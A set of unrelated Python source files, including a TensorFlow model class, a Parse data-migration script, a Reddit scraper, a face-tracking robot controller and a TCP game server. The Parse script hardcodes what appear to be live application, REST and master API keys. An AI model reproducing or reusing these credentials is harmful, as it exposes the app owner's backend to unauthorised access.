        Save the model: model.save_model(path='model_ckpts/model.ckpt')
        Saved files: checkpoint, model.ckpt.meta, model.ckpt.index, model.ckpt.data-00000-of-00001

        NOTE(review): create_dir_if_not_exist is not defined/imported in
        this module and self.model_type is commented out at class level —
        as written this method raises NameError/AttributeError.
        """
        print({
            'msg': 'DRM_Gradient.save start',
            'path': path,
        })
        create_dir_if_not_exist(path)
        self.saver.save(self.sess, path)
        model_info = {
            'model_type': self.model_type,
            'path': path,
            'params': self.get_params(),
        }
        print({
            'msg': 'DRM_Gradient.save finish',
            'model_info': model_info,
        })
        return model_info

    @classmethod
    def load(cls, model_info=None, abs_dir=None, spark=None):
        """
        Derived from BaseModel class.
        Load the model.

        NOTE(review): DRM_Gradient and get_abs_path are not defined in this
        module; DRM_Gradient(...) here probably should be
        cls(**model_info['params']).
        """
        print({
            'msg': 'DRM_Gradient.load start',
            'model_info': model_info,
            'abs_dir': abs_dir,
        })
        model = DRM_Gradient(**model_info['params'])
        abs_path = get_abs_path(model_info['path'], abs_dir=abs_dir)
        model.saver.restore(model.sess, abs_path)
        print({
            'msg': 'DRM_Gradient.load finish',
        })
        return model

    def calculte_control_cost_value(self,y,control_weight):
        # (sic: "calculte") Weighted average value and cost of the control
        # cohort, normalized by the total number of rows.
        N = y.shape[0]
        vc = np.dot(y[:,0],control_weight)/N
        cc = np.dot(y[:,1],control_weight)/N
        return vc,cc

    def fit(self, X=None,
            y=None,
            cohort_weight = None,
            control_column=-1 ,
            sample_weight=None, **kwargs):
        """
        Train the model
        :param X: input features
        :param y: label value, cost
        :param cohort_weight: per-row weights over the structures (one column per structure)
        :param control_column: the column at which we have control
        :param sample_weight: array of weights assigned to individual samples. If not provided, then unit weight
        :return: None
        :raises AssertionError: if target_loss is missing, y is malformed,
            or the final training loss does not reach target_loss
        """
        assert self.target_loss is not None, "Must pass in target_loss!"
        assert y.shape[1] == 2, 'y should have 2 columns!'
        # sample_weight = check_sample_weight(sample_weight, [y.shape[0], 1])
        # infer dim_inputs from X
        self.dim_inputs = X.shape[1]
        if self.standardization_input:
            self.scaler = StandardScaler().fit(X)
            X = self.scaler.transform(X)
        # TensorFlow initialization
        self._build_graph()
        # setting up variables we want to compute (and optimizing)
        variables = [self.loss, self.objective, self.train_step, self.W_lst]
        #calculate the control cost and value
        value_c,cost_c = self.calculte_control_cost_value(y,cohort_weight[:,control_column])
        # initialize variables
        self.sess.run(self._init)
        # record losses history
        objective_lst = []
        loss_lst = []
        for e in range(self.epochs):
            # gradient descent using all data (full-batch training)
            # create a feed dictionary for this batch
            feed_dict = {
                self.X: X,
                self.value: y[:,0],
                self.cost: y[:,1],
                self.cohort_weight: cohort_weight,
                self.control_value: [value_c],
                self.control_cost: [cost_c],
                # self.sample_weight: sample_weight,
            }
            loss, objective, train_step, W_lst = self.sess.run(variables, feed_dict=feed_dict)
            # aggregate performance stats
            # convert to float so it can be serialized to JSON
            loss_lst.append(float(loss))
            objective_lst.append(float(objective))
            # print every now and then
            if ((e + 1) % self.print_every == 0 or e == 0) and self.verbose:
                print("Epoch {0}: with training loss = {1}".format(e + 1, loss[0]))
        final_loss = loss_lst[-1]
        if self.verbose:
            print({
                # 'ts': get_dt_str(),
                'msg': 'DRM_gradient.fit',
                'final_loss': final_loss,
                'target_loss': self.target_loss,
            })
        assert final_loss < self.target_loss, \
            'Final loss: {}, target loss {} not reached, terminated'.format(final_loss, self.target_loss)
        # calculate average incremental value and cost in training set
        self.avg_inc_value_cost = self._calculate_avg_inc_value_cost(y)
        if self.plot_losses:
            plt.plot(loss_lst)
            plt.plot(objective_lst)
            plt.grid(True)
            plt.title('Historical Loss')
            plt.xlabel('Epoch Number')
            plt.ylabel('Epoch Loss')
            plt.show()
        # ToDo modularize logging the training statistics
        self.train_stats['objective_lst'] = objective_lst
        self.train_stats['loss_lst'] = loss_lst
        if self.verbose:
            print({
                'ts': get_dt_str(),
                'msg': 'DRM_gradient.fit finish',
                'final_loss': final_loss,
                'target_loss': self.target_loss,
                # 'W_lst': W_lst,
                'W_lst[0].shape': W_lst[0].shape,
                'W_lst[0].type': type(W_lst[0]),
            })

    def predict(self, X, **kwargs):
        """
        Predict scores for new samples.
        :param X: features in numpy array
        :return: softmax scores, one column per structure
        """
        if self.standardization_input:
            assert self.scaler is not None, "Training is not standardized"
            X = self.scaler.transform(X)
        assert self.sess is not None, "Model has not been fitted yet!"
        score = self.sess.run(self.score, feed_dict={self.X: X})
        return score

    @property
    def weights_lst(self):
        """
        Return the list of weights (length of this list is the number of layers).
        :return: a list with weights in each layer
        """
        assert self.sess is not None, "Model has not been fitted yet!"
        return self.sess.run(self.W_lst)

    @property
    def coef_(self):
        """
        Estimated coefficients for the linear DRM
        :return: array, shape (n_features, )
        """
        assert self.sess is not None, "Model has not been fitted yet!"
        return self.sess.run(self.W_lst)[0]

    def get_metrics(self):
        """
        Get metrics of the model.
        :return: a list of json representing metrics.

        NOTE(review): Figure is not imported in this module — this method
        raises NameError as written.
        """
        f = Figure(title='DRM_Gradient Train Loss', x_axis_label='Epoch', y_axis_label='Value')
        f.line(color='blue',
               x=range(len(self.train_stats['loss_lst'])),
               y=self.train_stats['loss_lst'],
               legend='Loss')
        f.line(color='green',
               x=range(len(self.train_stats['objective_lst'])),
               y=self.train_stats['objective_lst'],
               legend='CPIT')
        return [f.draw()]
if __name__ == "__main__":
    # Placeholder entry point; the model class is meant to be imported and
    # driven by external training code.
    print("main DRM function")
|
983,725 | 7ca7284c5aa33f0907436c70da8800ac77a7a6f4 | #!/usr/bin/python
import argparse
import time
from parse_rest.connection import register
from parse_rest.datatypes import Object
from parse_rest.connection import ParseBatcher
from parse_rest.user import User
from batchers import BatchSaver
# Parse Classes
class POFriendRelation(Object):
    """Parse data class for a friendship edge (userId / friendUserId columns)."""
    pass
class POFriendRequest(Object):
    """Parse data class for a pending friend request (requested_user / requesting_user columns)."""
    pass
class POPublicUser(Object):
    """Parse data class for a public user profile (userId column)."""
    pass
# Re-save every row of the migrated Parse classes so beforeSave hooks run.
# NOTE(review): real-looking API keys are committed as argparse defaults —
# these should be rotated and read from the environment instead.
parser = argparse.ArgumentParser(description='Creates updated columns on Parse for OneTap. Defaults to dev, pass the correct keys to use another app.')
parser.add_argument('application_key', nargs='?', default='nORiB9P52mCaD1Sm72mKQlhLcjgHGjGkpvW7tZO5')
parser.add_argument('rest_api_key', nargs='?', default='0oQwqO36Txv9GeDxkqbi9Fdp3go82BHtNpew18We')
parser.add_argument('master_key', nargs='?', default='R5YWuexk6BUdrCGrkz5HqLDvozv5iAzjw4lUC1AX')
parser.add_argument('-d', '--delay', type=float, help='The delay between each batch save', default=2.0)
args = parser.parse_args()

register(args.application_key,
         args.rest_api_key,
         master_key=args.master_key)

batch_saver = BatchSaver(args.delay)

# POFriendRelation
# userId and friendUserId
# Makes you think it contains a id string when its actually a user object.
# Possible Solution
# Create new columns called user and friendUser. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns.
print 'POFriendRelation'
page_number = 0
friend_relations = POFriendRelation.Query.all().order_by("createdAt").limit(1000)
# Page through all rows, 1000 at a time, queuing each for a batch re-save.
while len(friend_relations) > 0:
    # NOTE(review): friend_relations_to_save is assigned but never used.
    friend_relations_to_save = []
    for friend_relation in friend_relations:
        batch_saver.add_object_to_save(friend_relation)
    page_number += 1
    friend_relations = POFriendRelation.Query.all().order_by("createdAt").limit(1000).skip(page_number * 1000)

# POFriendRequest
# requested_user and requesting_user
# It isn't following the camelCase naming convention.
# Makes more work for the iOS app to do name conversions.
# Possible Solution
# Create new columns called requestedUser and requestingUser. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns.
print 'POFriendRequest'
page_number = 0
friend_requests = POFriendRequest.Query.all().order_by("createdAt").limit(1000)
while len(friend_requests) > 0:
    # NOTE(review): friend_requests_to_save is assigned but never used.
    friend_requests_to_save = []
    for friend_request in friend_requests:
        batch_saver.add_object_to_save(friend_request)
    page_number += 1
    friend_requests = POFriendRequest.Query.all().order_by("createdAt").limit(1000).skip(page_number * 1000)

# POPublicUser
# userId
# Should be the user object, not just the string id. Since users have an ACL, anyone that doesn't have permission will only get a user object back with a objectId.
# Possible Solution
# Create a new column called user. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns and the beforeSave.
print 'POPublicUser'
page_number = 0
public_users = POPublicUser.Query.all().order_by("createdAt").limit(1000)
while len(public_users) > 0:
    # NOTE(review): public_users_to_save is assigned but never used.
    public_users_to_save = []
    for public_user in public_users:
        batch_saver.add_object_to_save(public_user)
    page_number += 1
    public_users = POPublicUser.Query.all().order_by("createdAt").limit(1000).skip(page_number * 1000)

# POTrip
# userId
# Should be the user object, not just the string id.
# Possible Solution
# Create a new column called user. Add a before save that assign the value in the old column to the new column or vice versa. Then when enough people have the new version of the app, we can delete the old columns and the beforeSave.
# Flush everything queued above to Parse.
batch_saver.save()
|
983,726 | 83fec8d684458baec35eff75c96231e9093559c9 | from collections import defaultdict
def solution(gems):
    """Return the 1-based [start, end] indices of the shortest contiguous
    window of ``gems`` that contains every distinct gem at least once.

    Ties break toward the earliest window (only strictly shorter windows
    replace the current best). Classic two-pointer sliding window with a
    count map; O(n) time, O(k) space for k distinct gems.

    :param gems: list of gem-name strings
    :return: [start, end] as 1-based inclusive indices ([] for empty input)
    """
    if not gems:  # guard: the original indexed gems[0] unconditionally
        return []
    kinds = len(set(gems))           # number of distinct gem types to cover
    counts = defaultdict(int)        # gem -> occurrences inside [start, end]
    counts[gems[0]] += 1
    n = len(gems)
    best = [0, n - 1]                # worst case: the whole list
    start = end = 0
    while start < n and end < n:
        if len(counts) == kinds:
            # Window covers every kind: record it if strictly shorter,
            # then shrink from the left.
            if end - start < best[1] - best[0]:
                best = [start, end]
            counts[gems[start]] -= 1
            if counts[gems[start]] == 0:
                # Drop exhausted keys so len(counts) == kinds covered.
                del counts[gems[start]]
            start += 1
        else:
            # Some kind is missing: grow the window to the right.
            end += 1
            if end == n:
                break
            counts[gems[end]] += 1
    return [best[0] + 1, best[1] + 1]
983,727 | dd65a8c75c6a74faf32cbb091aa6a95eb2a001ef | import sys
import count_digits
import multiprocessing as mp
def main():
    """Count digits in each file named on the command line, in parallel.

    Usage: ``prog POOL FILENAMEs`` where POOL is the worker-process count.
    """
    if len(sys.argv) < 3:
        exit(f"Usage: {sys.argv[0]} POOL FILENAMEs")
    pool_size = int(sys.argv[1])
    filenames = sys.argv[2:]
    # Fan the per-file work out over a process pool.
    with mp.Pool(pool_size) as pool:
        per_file_counts = pool.map(count_digits.count_digits, filenames)
    count_digits.print_table(list(per_file_counts))
# Run only when executed as a script (not when imported).
if __name__ == "__main__":
    main()
|
983,728 | 286eb395e62eaf75d3e970a830861e374d6e7852 | import json
import requests
import time
import re
import os
import io
def makeRequest(uri, payload, max_retries = 5):
    """GET ``uri`` with query params ``payload`` and return the parsed JSON.

    Sleeps 1s before each attempt and retries up to ``max_retries`` times;
    the final attempt is made outside the retry loop so its exception
    propagates to the caller.

    :param uri: endpoint URL
    :param payload: dict of query-string parameters for requests.get
    :param max_retries: total number of attempts
    :raises AssertionError: if the final attempt returns a non-200 status
    """
    def fire_away(uri):
        # Single attempt: fetch, require HTTP 200, decode the JSON body.
        response = requests.get(uri, payload)
        assert response.status_code == 200
        return json.loads(response.content)

    for _ in range(max_retries - 1):
        try:
            time.sleep(1)
            return fire_away(uri)
        except Exception:
            # Was a bare `except:` — narrowed so Ctrl-C / SystemExit are
            # no longer swallowed by the retry loop.
            time.sleep(1)
    return fire_away(uri)
#get list of subreddit posts
#for each subreddit post, get the comments
#write the comments into a textfile with the submission, excluding comments from moderators/bots
#clean the resulting textfiles
def makeTextFiles(submissionlist, dir_path, after):
    """Write one text file per submission: its selftext followed by the
    bodies of its (filtered) pushshift comments.

    Files are named ``doc{after}-{j}.txt`` inside ``dir_path``.

    :param submissionlist: pushshift response dict with a 'data' list
    :param dir_path: output directory
    :param after: pagination tag used in the output file names
    """
    def deleteIrrelevantComments(commentlist):
        # Drop comments that mention moderators or have an empty body.
        # (The original index-based delete loop always advanced the index,
        # so it skipped the element right after each deletion.)
        pattern_mod = 'moderator(s?)'
        commentlist['data'] = [
            c for c in commentlist['data']
            if re.search(pattern_mod, c['body']) is None and len(c['body']) > 0
        ]

    def makeTextFile(submission, f):
        # f must already be open for writing.
        payload = {'fields': 'body', 'size': submission['num_comments'], 'link_id': submission['id'], 'author': '!LocationBot', 'mod_removed': 'false'}
        commentlist = makeRequest('https://api.pushshift.io/reddit/search/comment/', payload)
        deleteIrrelevantComments(commentlist)
        f.write(submission['selftext'])
        for comment in commentlist['data']:
            # write to textfile
            f.write(' ' + comment['body'])

    for j, submission in enumerate(submissionlist['data']):
        # `or` short-circuits; the original used bitwise `|`, which
        # evaluated every membership test eagerly.
        if ('id' not in submission) or ('num_comments' not in submission) or ('selftext' not in submission):
            print('Avoided Key Error')
            continue
        # `with` guarantees the file is closed even if makeRequest raises
        # (the original open/close pair leaked the handle on error).
        with open(os.path.join(dir_path, 'doc{}-{}.txt'.format(after, j)), 'w') as f:
            makeTextFile(submission, f)
def cleanFiles(dir_path, dir_name, parent_dir, after):
    """Normalize the raw scraped text files for this `after` batch and write
    the cleaned copies into a sibling ``<dir_name>_cleaned`` directory.

    The regex substitutions are order-sensitive (e.g. URLs are stripped
    before punctuation, contractions before generic symbol removal).
    """
    cleaned_dir_path = os.path.join(parent_dir, dir_name + '_cleaned')
    if not os.path.isdir(cleaned_dir_path):
        os.mkdir(cleaned_dir_path)
    # Only the up-to-100 files produced for this batch are candidates.
    dirlist = ['doc{}-{}.txt'.format(after,i) for i in range(100)]
    for filename in dirlist:
        if not os.path.exists(os.path.join(dir_path,filename)):
            continue
        # NOTE(review): `file` shadows the Python 2 builtin of the same name.
        file = open(os.path.join(dir_path,filename), 'r')
        content = file.read()
        content = content.lower()
        #delete quotes
        #pattern_quoted = r'>([\w\s’\'.?/,()]*\n\n|[\w\s’\'/,()]*)'
        #pattern_quoted = r'>([\w\s’\'.?/,()]*\n)'
        #content = re.sub(pattern_quoted,' ', content)
        #delete urls
        pattern_url = r'http(s?)://[\w/#\\:?._~-]*'
        content = re.sub(pattern_url,' ', content)
        #delete [removed], [deleted]
        pattern_removed = r'\[removed\]|\[deleted\]'
        content = re.sub(pattern_removed, ' ', content)
        #delete subreddit titles
        pattern_subreddit = r'r/\w*'
        content = re.sub(pattern_subreddit,' ', content)
        # delete html entities / comparison markers
        pattern_html = r'&gt;|&lt;|≥|≤|(&amp;(#x200b;)?)'
        content = re.sub(pattern_html,' ', content)
        #strip 's and (s)
        pattern_s = r'(\'|’)s|\(s\)'
        content = re.sub(pattern_s,' ', content)
        #delete punctuation
        pattern_symbols = r'(\*|\[|\]|\(|\)|-|/|\.(\.)+|,|\?)+'
        content = re.sub(pattern_symbols,' ', content)
        #delete words with that end with 't, 've, 're, 'll
        pattern_contractions = r'\w*(\'|’)(t|ve|re|ll|d)'
        content = re.sub(pattern_contractions,' ', content)
        #reduce all multiple whitespaces to 1
        pattern_whitespace = r'(\s)+'
        content = re.sub(pattern_whitespace,' ', content)
        new_file = open(os.path.join(cleaned_dir_path, filename), 'w')
        new_file.seek(0)
        new_file.truncate(0)
        new_file.write(content)
        new_file.close()
        file.close()
# Driver: scrape r/legaladvice submissions from pushshift in daily windows,
# dump each submission (plus comments) to a text file, then clean the files.
parent_dir = '/Users/soumyadugg/legal_advice_data'
dir_name = 'legal_advice_files'
dir_path = os.path.join(parent_dir, dir_name)
if not os.path.isdir(dir_path):
    os.mkdir(dir_path)

uri = 'https://api.pushshift.io/reddit/search/submission/'
subreddit = 'legaladvice'
request_size = 100
# NOTE(review): the dict literal repeats the key 'selftext:not', so only
# '[deleted]' survives — the '[removed]' filter is silently dropped.
payload = {'fields': ['id','num_comments','selftext'],
           'subreddit': subreddit,
           'size': request_size,
           'author':'!LocationBot',
           'mod_removed':'false',
           'user_removed':'false',
           'after':'',
           'selftext:not':'[removed]','selftext:not':'[deleted]'}

# One iteration per day-offset: 600d, 601d, ... 1599d ago.
for i in range(1000):
    after = str(600+i)
    print(str(i) + ' ' + after)
    payload['after'] = after+'d'
    submissionlist = makeRequest(uri, payload)
    makeTextFiles(submissionlist, dir_path, after)
    cleanFiles(dir_path, dir_name, parent_dir, after)
983,729 | 7533c2bafc4a2a12e4786d8572dc52c10a5a1c54 | """
HackerRank Algorithms Implementation Beautiful Days at the Movies
author: Manny egalli64@gmail.com
info: http://thisthread.blogspot.com/
https://www.hackerrank.com/challenges/beautiful-days-at-the-movies/problem
Given three integers i, j, k
Return how many beautiful number are in [i .. j] where
beautiful means that abs(x - reverse(x)) % k == 0
"""
def solution(first, last, divisor):
    """Count the "beautiful" days in the inclusive range [first, last].

    A day x is beautiful when x minus its decimal reversal is divisible by
    divisor. (Taking the absolute value is unnecessary: sign does not
    affect divisibility.)
    """
    return sum(
        1
        for day in range(first, last + 1)
        if (day - int(str(day)[::-1])) % divisor == 0
    )
if __name__ == '__main__':
    # Read "i j k" from stdin and print the count of beautiful days.
    i, j, k = map(int, input().split())
    print(solution(i, j, k))
983,730 | 559612e094ee76097b66c7a8c6be6b6fdb6a8858 | # import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import maestro
import numpy as np
import client
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(640, 480))

# Set motor enums — channel indices on the Maestro servo controller.
MOTORS = 1
TURN = 2
BODY = 0
HEADTILT = 4
HEADTURN = 3

# Set motor values — 6000 is used throughout as the neutral position.
tango = maestro.Controller()
body = 6000
headTurn = 6000
headTilt = 6000
turn = 6000
maxMotor = 5675
maxLeftTurn = 7000
maxRightTurn = 5000
motors = 6000
tCounter = 0
hCounter = 0
temp = 0
i = 0  # index into the search-position table in nextSearchPosition()

# Assign values to motors: center the head, leave body/turn untouched.
tango.setTarget(HEADTURN, headTurn)
tango.setTarget(HEADTILT, headTilt)
#tango.setTarget(TURN, turn)
#tango.setTarget(BODY, body)
#
# allow the camera to warmup
time.sleep(1)

# Set timer variables / state flags for the tracking loop below.
start_time = 0.0
bodyFlag = True
distFlag = True
time_flag = True
findHumanFlag = True

# capture frames from the camera — display window for the annotated feed.
cv2.namedWindow("Robo", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Robo", 800, 400)
cv2.moveWindow("Robo", 0, 0)
def shutdown():
    """Return the servos to neutral and close the client socket."""
    #motors = 6000
    turn = 6000
    headTilt = 6000
    #tango.setTarget(MOTORS, motors)
    tango.setTarget(TURN, turn)
    tango.setTarget(HEADTILT, headTilt)
    tango.setTarget(BODY, 6000)
    client.client.killSocket()
def nextSearchPosition():
    """Move head/body to the next pose in a fixed 9-step search sweep.

    Cycles through ``positions`` via the module-level index ``i``, wrapping
    back to the start after the last pose.
    """
    positions = [(6000, 6000, 6000), (6000, 7000, 6500), (6800, 7000, 6500), (6000, 7000, 6500), (5200, 7000, 6500), (6000, 6000, 6000),
                 (5200, 5000, 5500), (6000, 5000, 5500), (6800, 5000, 5500)] #tilt, turn, bodyturn
    global headTilt, headTurn, i
    headTilt = positions[i][0]
    headTurn = positions[i][1]
    tango.setTarget(HEADTURN, headTurn)
    tango.setTarget(HEADTILT, headTilt)
    tango.setTarget(BODY, positions[i][2])
    # Give the servos time to reach the pose before the next frame.
    time.sleep(1)
    i = i + 1
    if(i == 9):
        i = 0
def centerBody(xabs, yabs, xdist):
    """Rotate the robot's base so the face moves toward the horizontal
    center of the frame, then reset turn/body/head-turn to neutral.

    :param xabs: absolute horizontal pixel offset of the face from center
    :param yabs: absolute vertical pixel offset (unused here)
    :param xdist: signed horizontal offset (positive = face left of center)
    """
    global body, motors, turn, bodyFlag, headTilt, headTurn
    if(headTurn == 5000):
        # Head is fully turned right: swing the whole robot right.
        body = 5400
        turn = 5000
        tango.setTarget(MOTORS, motors)
        tango.setTarget(TURN, turn)
        time.sleep(.8)
    elif(headTurn == 7000):
        # Head is fully turned left: swing the whole robot left.
        body = 6600
        turn = 7000
        tango.setTarget(MOTORS, motors)
        tango.setTarget(TURN, turn)
        time.sleep(.8)
    elif(xabs > 75):
        # Face is well off-center: nudge the body, then the wheels.
        if(xdist > 0): #turn robot left
            if(body < 6000): #if was previously turned other way
                body = 6000
            if(body == 6000):
                body = 6600
            if(body == 6600): #already turned body, so turn machine
                turn = 7000
                #tango.setTarget(MOTORS, motors)
                tango.setTarget(TURN, turn)
                time.sleep(0.5)
                body = 6000
        elif(xdist < 0): # turn robot right
            if(body > 6000): # if was previously turned other way
                body = 6000
            if(body == 6000):
                body = 5550
            if(body == 5550):
                turn = 5000
                tango.setTarget(MOTORS, motors)
                tango.setTarget(TURN, turn)
                time.sleep(0.5)
                body = 6000
    # Hand off to head-only centering and park base servos at neutral.
    bodyFlag = False
    tango.setTarget(TURN, 6000)
    tango.setTarget(BODY, 6000)
    tango.setTarget(HEADTURN, 6000)
def centerScreen(xabs, yabs, xdist, ydist):
    """Pan/tilt the head toward the face; return True when "centered".

    NOTE(review): the elif can never be true — if ``yabs > 50`` the first
    branch already fires, so the elif's ``yabs > 50`` is unreachable and
    this function always returns False as written. The intended condition
    was probably ``yabs < 50``; confirm against the caller's
    "Found you human" check.
    """
    if((xabs > 60) or (yabs > 50)):
        # Overshoot the offset by 30% to speed up convergence.
        xdist = xdist + int(xdist*.3)
        ydist = ydist + int(ydist*.3)
        tango.setTarget(HEADTURN, 6000 + (xdist*2))
        tango.setTarget(HEADTILT, 6000 + (int(ydist*2.5)))
    elif((xabs < 60) and (yabs > 50)):
        return True
    return False
def startTimer():
    """Record the current time as the start of the lost-face countdown."""
    global start_time
    start_time = time.time()
def checkTimer(time_bool):
    """Drive the lost-face timeout state machine.

    With time_bool True: if more than 8 s have elapsed since startTimer(),
    re-arm the search flags (greet/body/distance) so the robot starts
    looking for a human again. With time_bool False (face currently seen):
    reset the timer state and step the search pose.
    """
    global start_time, time_flag, findHumanFlag, bodyFlag, distFlag
    if(time_bool):
        if(time.time() - start_time > 8):
            findHumanFlag = True
            bodyFlag = True
            distFlag = True
    else:
        start_time = 0
        time_flag = True
        nextSearchPosition()
# Main tracking loop: grab frames from the PiCamera, detect the nearest face
# with a Haar cascade, then either swing the body (bodyFlag), fine-track with
# the head servos, and regulate distance by face-bounding-box area.
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
    # grab the raw NumPy array representing the image
    image = frame.array
    # NOTE(review): the cascade is re-loaded from disk every frame; hoisting
    # this above the loop would avoid repeated file I/O — confirm and move.
    face_cascade = cv2.CascadeClassifier('data/haarcascades/haarcascade_frontalface_default.xml')
    faces = face_cascade.detectMultiScale(image, 1.3, 4)
    if(len(faces) != 0):
        # A face is visible: greet once, then track it.
        if(findHumanFlag):
            client.client.sendData("Hello Human")
            findHumanFlag = False
        checkTimer(False)
        x,y,w,h = faces[0]
        cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)
        # Offsets of the face centre from the 640x480 frame centre.
        xcenter = x + int((w/2))
        ycenter = y + int((h/2))
        xdist = 320 - xcenter
        ydist = 240 - ycenter
        xabs = abs(320 - xcenter)
        yabs = abs(240 - ycenter)
        if(bodyFlag):
            centerBody(xabs, yabs, xdist)
        else:
            centerScreen(xabs, yabs, xdist, ydist)
            if(distFlag):
                # Use face area (w*h) as a distance proxy; drive until it
                # lands in the 19000-24000 px^2 band.
                if(w*h < 19000 or w*h > 24000):
                    if(w*h < 19000): #move forwards
                        temp = (19000-w*h) / 5800
                        motors = 5200
                        tango.setTarget(MOTORS, motors)
                        time.sleep(temp)
                    elif(w*h > 24000): #move backwards
                        temp = (w*h-24000)/50000
                        motors = 6900
                        tango.setTarget(MOTORS, motors)
                        time.sleep(temp)
                distFlag = False
                motors = 6000
                tango.setTarget(MOTORS, motors)
            if(centerScreen(xabs, yabs, xdist, ydist)):
                print("Found you human")
    else:
        # No face: arm the timer on the first miss, afterwards let
        # checkTimer decide when to restart the search sweep.
        if(time_flag):
            startTimer()
            time_flag = False
        else:
            checkTimer(True)
            if(findHumanFlag):
                nextSearchPosition()
    cv2.imshow("Robo", image)
    key = cv2.waitKey(1) & 0xFF
    #stop()
    # clear the stream in preparation for the next frame
    rawCapture.truncate(0)
    # if the `q` key was pressed, break from the loop
    if key == ord("q"):
        shutdown()
        break
|
983,731 | e0a2daeb693b45665e2016df8889803524136df3 | from Creature import Creature
class Human(Creature):
    """A Creature with an additional gender attribute."""

    def __init__(self, name, thing_property, gender, ability_to_die):
        """Initialise the base Creature, then record this human's gender."""
        Creature.__init__(self, name, thing_property, ability_to_die)
        self.gender = gender

    def __str__(self):
        # Bug fix: __str__ must *return* a string — the original printed and
        # implicitly returned None, so str(obj)/print(obj) raised TypeError.
        # It also used '%S', an invalid conversion specifier that raises
        # ValueError at format time; corrected to '%s'.
        # NOTE(review): relies on Creature defining ability_to_die and
        # property_die — confirm those attribute names against Creature.
        return ('Your name is %s,Can you think of?%s,what your gender %s,can your die %s'
                % (self.name, self.ability_to_die, self.gender, self.property_die))
983,732 | 5567103072085803fff5ce9a586f2754ae0884b4 | #!/bin/env python3
"""Demo function to show how to use Monpyou."""
from monpyou import MonpYou
from monpyou.const import __version__
import argparse
import logging
def main(username: str, password: str):
    """Log in to MonpYou, refresh the accounts, and print one line each."""
    print("Monpyou version "+__version__)
    session = MonpYou(username, password)
    session.update_accounts()
    line = "{} ({}): {} {}"
    for acc in session.accounts:
        print(line.format(acc.name, acc.iban, acc.balance, acc.currency))
if __name__ == '__main__':
    """simple command line wrapper.
    - Reads username/password as argument
    - sets loglevel
    - calls main function
    """
    # Positional args: monpyou_demo.py USERNAME PASSWORD
    parser = argparse.ArgumentParser()
    parser.add_argument('username')
    parser.add_argument('password')
    args = parser.parse_args()
    logging.basicConfig(level=logging.INFO)
    main(args.username, args.password)
|
983,733 | a5572dc9b12709756e4b6ef5349d5e9e85089dac | __author__ = 'pythonspot.com'
# Demonstrate three basic Python value types and print each one.
x = 1        # int
y = 1.234    # float
z = True     # bool
for value in (x, y, z):
    print(value)
|
983,734 | b95742bde07453958438e8e8c709fbee8401fcba |
from setuptools import setup, find_packages
#from beamshapes.version import __version__
# Read __version__ from beamshapes/version.py without importing the package
# (importing would require its dependencies to be installed already).
version_number = {}
with open("beamshapes/version.py") as fp:
    exec(fp.read(), version_number)
# link to test upload and fresh install on Test PyPi https://packaging.python.org/guides/using-testpypi/
setup(name='beamshapes',
      version=version_number['__version__'],
      description='Acoustic beamshape modelling for various sources',
      long_description=open('README.md').read(),
      long_description_content_type="text/markdown",
      url='https://github.com/thejasvibr/bat_beamshapes.git',
      author='Thejasvi Beleyur',
      author_email='thejasvib@gmail.com',
      license='MIT',
      install_requires=['joblib','numpy','sympy','mpmath',
                        'scipy','matplotlib','tqdm'],
      packages=find_packages(),
      zip_safe=False,
      include_package_data=True,
      classifiers=[
          'Intended Audience :: Science/Research',
          'Topic :: Multimedia :: Sound/Audio :: Analysis',
          'Programming Language :: Python :: 3'
      ])
983,735 | 4c4e3be2cf80383db43c189667ee5b34a5178598 | import socket
import select
from gamelogic import Account
import logging
class TcpServer(object):
    """Non-blocking TCP game server driven by a select() loop.

    Accepts clients on a listen socket and wraps each accepted socket in an
    Account connection object; connections register/unregister their
    sockets for read/write interest through the add_/remove_ helpers.
    """
    def __init__(self, config):
        """config is a dict providing at least 'host' and 'port'."""
        self.logger = logging.getLogger("TcpServer")
        self.logger.setLevel(logging.DEBUG)
        self._host = config.get("host", None)
        self._port = config.get("port", None)
        self._listen_socket = None
        # Maps socket object -> Account connection wrapper.
        self._connections = {}
        self._need_read_sockets = []
        self._need_write_sockets = []
    def start(self):
        """Create the non-blocking listen socket and register it for reads."""
        self._listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._listen_socket.setblocking(False)
        self._listen_socket.bind((self._host, self._port))
        self._listen_socket.listen(100)
        self._need_read_sockets.append(self._listen_socket)
    def run(self):
        """Event loop: poll with a 0.1 s timeout and dispatch socket events."""
        self.logger.info("Server Start")
        while True:
            in_sockets, out_sockets, error_sockets = select.select(self._need_read_sockets, self._need_write_sockets, self._need_read_sockets, 0.1)
            for obj in error_sockets:
                self.logger.error("error socket:%s", obj)
                conn = self._connections.get(obj, None)
                if conn:
                    conn.close_connection()
            for obj in in_sockets:
                # A readable listen socket means a pending accept; the
                # listen socket is never in _connections, so the lookup
                # below is a harmless no-op for it.
                if obj == self._listen_socket:
                    self.new_client()
                conn = self._connections.get(obj, None)
                if conn:
                    conn.handle_read_event()
            for obj in out_sockets:
                conn = self._connections.get(obj, None)
                if conn:
                    conn.handle_write_event()
    def new_client(self):
        """Accept one pending client and wrap it in an Account connection."""
        client_socket, client_addr = self._listen_socket.accept()
        client_socket.setblocking(False)
        conn = Account.Account(self, client_socket)
        self._connections[client_socket] = conn
        self.logger.info("new client %s fd(%s)", client_socket.getpeername(), client_socket.fileno())
    def remove_connection(self, socket_obj):
        """Forget the connection wrapper for a closed socket."""
        self._connections.pop(socket_obj)
    def add_read_need(self, socket_obj):
        """Register a socket for read-readiness polling."""
        self._need_read_sockets.append(socket_obj)
    def remove_read_need(self, socket_obj):
        """Stop polling a socket for read-readiness."""
        self._need_read_sockets.remove(socket_obj)
    def add_write_need(self, socket_obj):
        """Register a socket for write-readiness polling."""
        self._need_write_sockets.append(socket_obj)
    def remove_write_need(self, socket_obj):
        """Stop polling a socket for write-readiness."""
